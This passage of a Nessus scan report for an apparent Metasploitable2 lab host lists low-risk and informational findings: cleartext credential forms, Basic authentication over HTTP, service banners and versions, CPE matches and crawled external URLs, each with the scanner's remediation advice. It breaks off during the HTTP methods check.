The remote web server contains at least one HTML form field that has an input of type 'password' where 'autocomplete' is not set to 'off'.

While this does not represent a risk to this web server per se, it does mean that users who use the affected forms may have their credentials saved in their browsers, which could in turn lead to a loss of confidentiality if any of them use a shared host or if their machine is compromised at some point.
Solution
Add the attribute 'autocomplete=off' to these fields to prevent browsers from caching credentials.
Risk Factor
Low
Plugin Information
Published: 2009/10/07, Modified: 2023/07/17
Plugin Output

tcp/8180/www

Page : /admin/
Destination Page: /admin/j_security_check

Page : /admin/error.jsp
Destination Page: /admin/j_security_check

26194 - Web Server Transmits Cleartext Credentials
-
Synopsis
The remote web server might transmit credentials in cleartext.
Description
The remote web server contains several HTML form fields containing an input of type 'password' which transmit their information to a remote web server in cleartext.

An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords of valid users.
Solution
Make sure that every sensitive form transmits content over HTTPS.
Risk Factor
Low
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
References
XREF CWE:522
XREF CWE:523
XREF CWE:718
XREF CWE:724
XREF CWE:928
XREF CWE:930
Plugin Information
Published: 2007/09/28, Modified: 2016/11/29
Plugin Output

tcp/80/www

Page : /phpMyAdmin/
Destination Page: /phpMyAdmin/index.php

Page : /phpMyAdmin/index.php
Destination Page: /phpMyAdmin/index.php

26194 - Web Server Transmits Cleartext Credentials
-
Synopsis
The remote web server might transmit credentials in cleartext.
Description
The remote web server contains several HTML form fields containing an input of type 'password' which transmit their information to a remote web server in cleartext.

An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords of valid users.
Solution
Make sure that every sensitive form transmits content over HTTPS.
Risk Factor
Low
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
References
XREF CWE:522
XREF CWE:523
XREF CWE:718
XREF CWE:724
XREF CWE:928
XREF CWE:930
Plugin Information
Published: 2007/09/28, Modified: 2016/11/29
Plugin Output

tcp/8180/www

Page : /admin/
Destination Page: /admin/j_security_check

Page : /admin/error.jsp
Destination Page: /admin/j_security_check
34850 - Web Server Uses Basic Authentication Without HTTPS
-
Synopsis
The remote web server seems to transmit credentials in cleartext.
Description
The remote web server contains web pages that are protected by 'Basic'
authentication over cleartext.

An attacker eavesdropping the traffic might obtain logins and passwords of valid users.
Solution
Make sure that HTTP authentication is transmitted over HTTPS.
Risk Factor
Low
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
References
XREF CWE:319
XREF CWE:928
XREF CWE:930
XREF CWE:934
Plugin Information
Published: 2008/11/21, Modified: 2016/11/29
Plugin Output

tcp/8180/www


The following web pages use Basic Authentication over an unencrypted
channel :

/host-manager/html:/ realm="Tomcat Host Manager Application"
/manager/html:/ realm="Tomcat Manager Application"
/manager/status:/ realm="Tomcat Manager Application"

10407 - X Server Detection
-
Synopsis
An X11 server is listening on the remote host
Description
The remote host is running an X11 server. X11 is a client-server protocol that can be used to display graphical applications running on a given host on a remote client.

Since the X11 traffic is not ciphered, it is possible for an attacker to eavesdrop on the connection.
Solution
Restrict access to this port. If the X11 client/server facility is not used, disable TCP support in X11 entirely (-nolisten tcp).
Risk Factor
Low
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2000/05/12, Modified: 2019/03/05
Plugin Output

tcp/6000/x11


X11 Version : 11.0

21186 - AJP Connector Detection
-
Synopsis
There is an AJP connector listening on the remote host.
Description
The remote host is running an AJP (Apache JServ Protocol) connector, a service by which a standalone web server such as Apache communicates over TCP with a Java servlet container such as Tomcat.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2006/04/05, Modified: 2019/11/22
Plugin Output

tcp/8009/ajp13


The connector listing on this port supports the ajp13 protocol.

46180 - Additional DNS Hostnames
-
Synopsis
Nessus has detected potential virtual hosts.
Description
Hostnames different from the current hostname have been collected by miscellaneous plugins. Nessus has generated a list of hostnames that point to the remote host. Note that these are only the alternate hostnames for vhosts discovered on a web server.

Different web servers may be hosted on name-based virtual hosts.
See Also
Solution
If you want to test them, re-scan using the special vhost syntax, such as :

www.example.com[192.0.32.10]
Risk Factor
None
Plugin Information
Published: 2010/04/29, Modified: 2022/08/15
Plugin Output

tcp/0

The following hostnames point to the remote host :
- 04cbebc48a57
- 04cbebc48a57.sicurform
18261 - Apache Banner Linux Distribution Disclosure
-
Synopsis
The name of the Linux distribution running on the remote host was found in the banner of the web server.
Description
Nessus was able to extract the banner of the Apache web server and determine which Linux distribution the remote host is running.
Solution
If you do not wish to display this information, edit 'httpd.conf' and set the directive 'ServerTokens Prod' and restart Apache.
Risk Factor
None
Plugin Information
Published: 2005/05/15, Modified: 2025/03/31
Plugin Output

tcp/0


The Linux distribution detected was :
- Ubuntu 8.04 (gutsy)

48204 - Apache HTTP Server Version
-
Synopsis
It is possible to obtain the version number of the remote Apache HTTP server.
Description
The remote host is running the Apache HTTP Server, an open source web server. It was possible to read the version number from the banner.
See Also
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0030
XREF IAVT:0001-T-0530
Plugin Information
Published: 2010/07/30, Modified: 2023/08/17
Plugin Output

tcp/80/www


URL : http://metasploitable2.sicurform/
Version : 2.2.99
Source : Server: Apache/2.2.8 (Ubuntu) DAV/2
backported : 1
modules : DAV/2
os : ConvertedUbuntu

39446 - Apache Tomcat Detection
-
Synopsis
The remote web server is an Apache Tomcat server.
Description
Nessus was able to detect a remote Apache Tomcat web server.

NOTE: When paranoia levels are elevated, this plugin will also consider versions obtained from responses with non-200 HTTP status codes.
See Also
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0535
Plugin Information
Published: 2009/06/18, Modified: 2025/05/15
Plugin Output

tcp/8180/www


URL : http://metasploitable2.sicurform:8180/
Version : 5.5
backported : 0
source : Apache Tomcat/5.5

39519 - Backported Security Patch Detection (FTP)
-
Synopsis
Security patches are backported.
Description
Security patches may have been 'backported' to the remote FTP server without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2009/06/25, Modified: 2015/07/07
Plugin Output

tcp/2121/ftp


Give Nessus credentials to perform local checks.

84574 - Backported Security Patch Detection (PHP)
-
Synopsis
Security patches have been backported.
Description
Security patches may have been 'backported' to the remote PHP install without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2015/07/07, Modified: 2024/11/22
Plugin Output

tcp/80/www


Give Nessus credentials to perform local checks.

39520 - Backported Security Patch Detection (SSH)
-
Synopsis
Security patches are backported.
Description
Security patches may have been 'backported' to the remote SSH server without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2009/06/25, Modified: 2015/07/07
Plugin Output

tcp/22/ssh


Give Nessus credentials to perform local checks.

39521 - Backported Security Patch Detection (WWW)
-
Synopsis
Security patches are backported.
Description
Security patches may have been 'backported' to the remote HTTP server without changing its version number.

Banner-based checks have been disabled to avoid false positives.

Note that this test is informational only and does not denote any security problem.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2009/06/25, Modified: 2015/07/07
Plugin Output

tcp/80/www


Give Nessus credentials to perform local checks.

45590 - Common Platform Enumeration (CPE)
-
Synopsis
It was possible to enumerate CPE names that matched on the remote system.
Description
By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host.

Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2010/04/21, Modified: 2025/04/15
Plugin Output

tcp/0


Following application CPE's matched on the remote system :

cpe:/a:apache:http_server:2.2.8 -> Apache Software Foundation Apache HTTP Server
cpe:/a:apache:http_server:2.2.99 -> Apache Software Foundation Apache HTTP Server
cpe:/a:apache:tomcat:5.5 -> Apache Software Foundation Tomcat
cpe:/a:mysql:mysql -> MySQL MySQL
cpe:/a:openbsd:openssh:4.7 -> OpenBSD OpenSSH
cpe:/a:openbsd:openssh:4.7p1 -> OpenBSD OpenSSH
cpe:/a:php:php:5.2.4 -> PHP PHP
cpe:/a:php:php:5.2.4-2ubuntu5.10 -> PHP PHP
cpe:/a:phpmyadmin:phpmyadmin:3.1.1 -> phpMYAdmin
cpe:/a:postgresql:postgresql -> PostgreSQL
cpe:/a:samba:samba:3.0.20 -> Samba Samba
cpe:/a:twiki:twiki:01_feb_2003 -> TWiki
54615 - Device Type
-
Synopsis
It is possible to guess the remote device type.
Description
Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc).
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2011/05/23, Modified: 2025/03/12
Plugin Output

tcp/0

Remote device type : general-purpose
Confidence level : 95
86420 - Ethernet MAC Addresses
-
Synopsis
This plugin gathers MAC addresses from various sources and consolidates them into a list.
Description
This plugin gathers MAC addresses discovered from both remote probing of the host (e.g. SNMP and Netbios) and from running local checks (e.g. ifconfig). It then consolidates the MAC addresses into a single, unique, and uniform list.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2015/10/16, Modified: 2025/06/10
Plugin Output

tcp/0

The following is a consolidated list of detected MAC addresses:
- 02:42:AC:13:00:02

49704 - External URLs
-
Synopsis
Links to external sites were gathered.
Description
Nessus gathered HREF links to external sites by crawling the remote web server.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2010/10/04, Modified: 2011/08/19
Plugin Output

tcp/80/www


104 external URLs were gathered on this web server :
URL... - Seen on...


http://TWiki.org/ - /twiki/bin/view/Main/WebHome
http://TWiki.org/cgi-bin/view/Main/TWikiAdminGroup - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/Main/TWikiUsers - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/AlWilliams - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/AndreaSterbini - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/BookView - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ChangePassword - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ChristopheVermeulen - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ColasNahaboo - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/CrisBailiff - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/DavidWarman - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/DontNotify - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/FileAttachment - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/FormattedSearch - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/HaroldGottschalk - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/InterwikiPlugin - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/JohnAltstadt - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/JohnTalintyre - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/KevinKinnell - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/KlausWriessnegger - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ManagingTopics - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ManagingWebs - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ManpreetSingh - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/NewUserTemplate - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/NicholasLee - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/PeterFokkinga - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/PeterThoeny - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/ResetPassword - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/RichardDonkin - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/RyanFreebern - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/StanleyKnutson - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/SvenDowideit - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiAccessControl - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiAccessControl#SuperAdminGroup - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiDocumentation - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiForms - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiFuncModule - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiMetaData - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiPlugins#PluginAPI - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiPreferences - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiRegistration - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiTemplates - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiUserAuthentication - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TWikiVariables - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TextFormattingFAQ - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/TextFormattingRules - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebChanges - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebNotify - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebPreferences - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebSearch - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WebStatistics - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiName - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiNotation - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiTopic - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiWikiClones - /twiki/TWikiHistory.html
http://TWiki.org/cgi-bin/view/TWiki/WikiWord - /twiki/TWikiHistory.html
http://en.wikipedia.org/wiki/Robots_exclusion_standard - /mutillidae/
http://irongeek.com - /mutillidae/
http://php.net/mcrypt - /phpMyAdmin/
http://samurai.inguardians.com/ - /mutillidae/
http://twiki.org/cgi-bin/view/Codev.DocRequest - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.DocsToDo - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureBrainstorming - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureDocumented - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureDone - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureEnhancementRequest - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureToDo - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.FeatureUnderConstruction - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev.ReadmeFirst - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/AttachedNotificationLinksBug - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/AuthenticationBasedOnGroups - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/BetterTWikiTagTemplateProcessing - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/CreateLinkToAttachedFileBug - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/FileAttachmentFilterSecurityAlert - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/IncludeHandlingImprovements - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/TWikiSkins - /twiki/TWikiHistory.html
http://twiki.org/cgi-bin/view/Codev/UppercaseAttachments - /twiki/TWikiHistory.html
http://www.backtrack-linux.org/ - /mutillidae/
http://www.eclipse.org/pdt/ - /mutillidae/
http://www.hackersforcharity.org/ - /mutillidae/
http://www.hackersforcharity.org/ghdb/ - /mutillidae/
http://www.irongeek.com - /mutillidae/
http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2007-A3 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2007-A6 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A1 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A10 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A2 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A3 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A4 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A5 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A6 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A7 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A8 - /mutillidae/
http://www.owasp.org/index.php/Top_10_2010-A9 - /mutillidae/
http://www.php.net/ - /mutillidae/
http://www.phpmyadmin.net - /phpMyAdmin/
http://www.quest.com/toad-for-mysql/ - /mutillidae/
http://www.youtube.com/user/webpwnized - /mutillidae/
https://addons.mozilla.org/en-US/firefox/collections/jdruin/pro-web-developer-qa-pack/ - /mutillidae/
https://twitter.com/webpwnized - /mutillidae/
https://www.owasp.org - /mutillidae/
https://www.owasp.org/index.php/Top_Ten - /mutillidae/

49704 - External URLs
-
Synopsis
Links to external sites were gathered.
Description
Nessus gathered HREF links to external sites by crawling the remote web server.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2010/10/04, Modified: 2011/08/19
Plugin Output

tcp/8180/www


112 external URLs were gathered on this web server :
URL... - Seen on...


http://ant.apache.org - /tomcat-docs/manager-howto.html
http://ant.apache.org/bindownload.cgi - /tomcat-docs/building.html
http://apache.apache.org/ - /tomcat-docs/appdev/index.html
http://apr.apache.org/ - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_proxy_ajp.html - /tomcat-docs/config/ajp.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcacertificatefile - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcacertificatepath - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcarevocationfile - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcarevocationpath - /tomcat-docs/apr.html
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslcertificatechainfile - /tomcat-docs/apr.html
http://httpd.apache.org/docs/howto/ssi.html#basicssidirectives - /tomcat-docs/ssi-howto.html
http://issues.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_status=RESOLVED&resolution=LATER&resolution=REMIND&resolution=---&bugidtype=include&product=Tomcat+5&cmdtype=doit&order=Importance - /
http://issues.apache.org/bugzilla/show_bug.cgi?id=22679 - /tomcat-docs/ssl-howto.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=34643 - /tomcat-docs/ssl-howto.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=37668 - /tomcat-docs/config/context.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=38217 - /tomcat-docs/ssl-howto.html
http://issues.apache.org/bugzilla/show_bug.cgi?id=39013 - /tomcat-docs/config/context.html
http://jakarta.apache.org/commons - /tomcat-docs/jndi-resources-howto.html
http://jakarta.apache.org/commons/dbcp/configuration.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://jakarta.apache.org/commons/logging - /tomcat-docs/logging.html
http://jakarta.apache.org/regexp/ - /tomcat-docs/config/context.html
http://jakarta.apache.org/site/downloads/downloads_commons-logging.cgi - /tomcat-docs/logging.html
http://jakarta.apache.org/site/vendors.html - /tomcat-docs/developers.html
http://jakarta.apache.org/slide/ - /webdav/index.html
http://jakarta.apache.org/struts/ - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://jakarta.apache.org/taglibs/doc/standard-doc/intro.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://jakarta.apache.org/tomcat/ - /jsp-examples/
http://jakarta.apache.org/tomcat/tomcat-5.5-doc/ - /tomcat-docs/catalina/docs/api/index.html
http://java.sun.com/Series/Tutorial/java/threads/multithreaded.html - /tomcat-docs/servletapi/javax/servlet/Servlet.html
http://java.sun.com/j2ee - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/j2ee/blueprints/ - /tomcat-docs/appdev/introduction.html
http://java.sun.com/j2ee/download.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/j2se/ - /tomcat-docs/building.html
http://java.sun.com/j2se/1.3/docs/guide/jdbc/spec2/jdbc2.1.frame.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/j2se/1.4.1/docs/guide/security/jaas/JAASLMDevGuide.html - /tomcat-docs/realm-howto.html
http://java.sun.com/j2se/1.4.1/docs/guide/security/jaas/tutorials/GeneralAcnOnly.html - /tomcat-docs/realm-howto.html
http://java.sun.com/j2se/1.4.1/docs/guide/security/jaas/tutorials/LoginConfigFile.html - /tomcat-docs/realm-howto.html
http://java.sun.com/j2se/1.4.2/docs/api/java/util/logging/Filter.html - /tomcat-docs/logging.html
http://java.sun.com/j2se/1.4.2/docs/api/java/util/logging/Formatter.html - /tomcat-docs/logging.html
http://java.sun.com/j2se/1.4.2/docs/api/java/util/logging/Level.html - /tomcat-docs/logging.html
http://java.sun.com/j2se/1.4/docs/guide/standards/index.html - /tomcat-docs/class-loader-howto.html
http://java.sun.com/j2se/1.5.0/docs/guide/management/agent.html - /tomcat-docs/monitoring.html
http://java.sun.com/products/JavaManagement/index.html - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://java.sun.com/products/javabeans/glasgow/jaf.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/javamail - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/javamail/downloads/index.html - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jdbc/ - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jdbc/jdbc20.stdext.pdf - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jdk/1.2/docs/tooldocs/solaris/policytool.html - /tomcat-docs/security-manager-howto.html
http://java.sun.com/products/jdk/idl/index.html - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://java.sun.com/products/jndi/ - /tomcat-docs/catalina/funcspecs/fs-jndi-realm.html
http://java.sun.com/products/jndi/#download - /tomcat-docs/jndi-resources-howto.html
http://java.sun.com/products/jndi/docs.html - /tomcat-docs/realm-howto.html
http://java.sun.com/products/jsp - /
http://java.sun.com/products/jsp/ - /tomcat-docs/introduction.html
http://java.sun.com/products/jsp/download.html - /tomcat-docs/appdev/introduction.html
http://java.sun.com/products/jsp/jstl - /tomcat-docs/jndi-datasource-examples-howto.html
http://java.sun.com/products/jsse/ - /tomcat-docs/ssl-howto.html
http://java.sun.com/products/rmi/index.html - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://java.sun.com/products/servlet - /
http://java.sun.com/products/servlet/ - /tomcat-docs/introduction.html
http://java.sun.com/products/servlet/download.html - /tomcat-docs/
http://java.sun.com/security/ - /tomcat-docs/security-manager-howto.html
http://java.sun.com/security/seccodeguide.html - /tomcat-docs/security-manager-howto.html
http://java.sun.com/webservices/downloads/webservicespack.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://localhost:8080/jsp-examples/jsp2/jspx/textRotate.jspx?name=JSPX - /jsp-examples/jsp2/jspx/svgexample.html
http://localhost:8080/jsp-examples/security/protected/ - /tomcat-docs/realm-howto.html
http://localhost:8080/sample - /tomcat-docs/appdev/sample/
http://logging.apache.org/log4j - /tomcat-docs/logging.html
http://logging.apache.org/log4j/docs/documentation.html - /tomcat-docs/logging.html
http://mail-archives.apache.org/mod_mbox/tomcat-dev/ - /
http://mail-archives.apache.org/mod_mbox/tomcat-users/ - /
http://marc.theaimsgroup.com/?l=tomcat-dev&w=2&r=1&s=5.next&q=b - /tomcat-docs/status.html
http://metasploitable2.sicurform:8180/admin/error.jsp - /admin/j_security_check
http://metasploitable2.sicurform:8180/admin/login.jsp - /admin/
http://mmmysql.sourceforge.net - /tomcat-docs/jndi-datasource-examples-howto.html
http://oss.software.ibm.com/developerworks/opensource/jikes/ - /tomcat-docs/jasper-howto.html
http://otn.oracle.com/ - /tomcat-docs/jndi-datasource-examples-howto.html
http://tomcat.apache.org/ - /
http://tomcat.apache.org/bugreport.html - /
http://tomcat.apache.org/connectors-doc/ - /tomcat-docs/
http://tomcat.apache.org/connectors-doc/index.html - /tomcat-docs/
http://tomcat.apache.org/download-55.cgi - /tomcat-docs/appdev/installation.html
http://tomcat.apache.org/faq - /tomcat-docs/
http://tomcat.apache.org/faq/ - /
http://tomcat.apache.org/faq/cluster.html - /tomcat-docs/cluster-howto.html
http://tomcat.apache.org/lists.html - /tomcat-docs/introduction.html
http://tomcat.apache.org/tomcat-5.5-doc/catalina/funcspecs/fs-admin-opers.html - /tomcat-docs/monitoring.html
http://tomcat.apache.org/tomcat-5.5-doc/catalina/funcspecs/mbean-names.html - /tomcat-docs/monitoring.html
http://tomcat.heanet.ie/native/ - /tomcat-docs/apr.html
http://wiki.apache.org/tomcat/ - /tomcat-docs/introduction.html
http://www.apache.org/ - /
http://www.cvshome.org - /tomcat-docs/appdev/installation.html
http://www.gnu.org/software/classpath/cp-tools/ - /tomcat-docs/servletapi/about.html
http://www.google.com/search?q=tomcat+mailing+list+archives - /tomcat-docs/introduction.html
http://www.ics.uci.edu/pub/ietf/webdav/ - /webdav/index.html
http://www.ietf.org/rfc/rfc2045.txt - /tomcat-docs/servletapi/javax/servlet/ServletResponse.html
http://www.jcp.org - /tomcat-docs/
http://www.jcp.org/en/jsr/detail?id=196 - /tomcat-docs/realm-howto.html
http://www.jcp.org/jsr/detail/152.jsp - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://www.jcp.org/jsr/detail/154.jsp - /tomcat-docs/catalina/funcspecs/fs-admin-apps.html
http://www.jguru.com/faq/home.jsp?topic=Tomcat - /tomcat-docs/introduction.html
http://www.mysql.com/products/connector-j - /tomcat-docs/jndi-datasource-examples-howto.html
http://www.mysql.com/products/mysql/index.html - /tomcat-docs/jndi-datasource-examples-howto.html
http://www.openldap.org - /tomcat-docs/realm-howto.html
http://www.openssl.org - /tomcat-docs/apr.html
http://www.openssl.org/ - /tomcat-docs/ssl-howto.html
http://www.rfc-editor.org/rfc/rfc2046.txt - /tomcat-docs/catalina/funcspecs/fs-default.html
http://www.rfc-editor.org/rfc/rfc2616.txt - /tomcat-docs/catalina/funcspecs/fs-default.html
http://www.webdav.org - /webdav/index.html
http://www.webdav.org/projects/ - /webdav/index.html
http://xml.apache.org/batik/index.html - /jsp-examples/jsp2/jspx/svgexample.html

10092 - FTP Server Detection
-
Synopsis
An FTP server is listening on a remote port.
Description
It is possible to obtain the banner of the remote FTP server by connecting to a remote port.
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0030
XREF IAVT:0001-T-0943
Plugin Information
Published: 1999/10/12, Modified: 2023/08/17
Plugin Output

tcp/21/ftp


The remote FTP banner is :

220 (vsFTPd 2.3.4)

10092 - FTP Server Detection
-
Synopsis
An FTP server is listening on a remote port.
Description
It is possible to obtain the banner of the remote FTP server by connecting to a remote port.
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0030
XREF IAVT:0001-T-0943
Plugin Information
Published: 1999/10/12, Modified: 2023/08/17
Plugin Output

tcp/2121/ftp


The remote FTP banner is :

220 ProFTPD 1.3.1 Server (Debian) [::ffff:172.19.0.2]

43111 - HTTP Methods Allowed (per directory)
-
Synopsis
This plugin determines which HTTP methods are allowed on various CGI directories.
Description
By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory.

The following HTTP methods are considered insecure:
PUT, DELETE, CONNECT, TRACE, HEAD

Many frameworks and languages treat 'HEAD' as a 'GET' request, albeit one without any body in the response. If a security constraint was set on 'GET' requests such that only 'authenticatedUsers' could access GET requests for a particular servlet or resource, it would be bypassed for the 'HEAD' version. This allowed unauthorized blind submission of any privileged GET request.

As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes'
in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501.

Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2009/12/10, Modified: 2022/04/11
Plugin Output

tcp/80/www

Based on the response to an OPTIONS request :

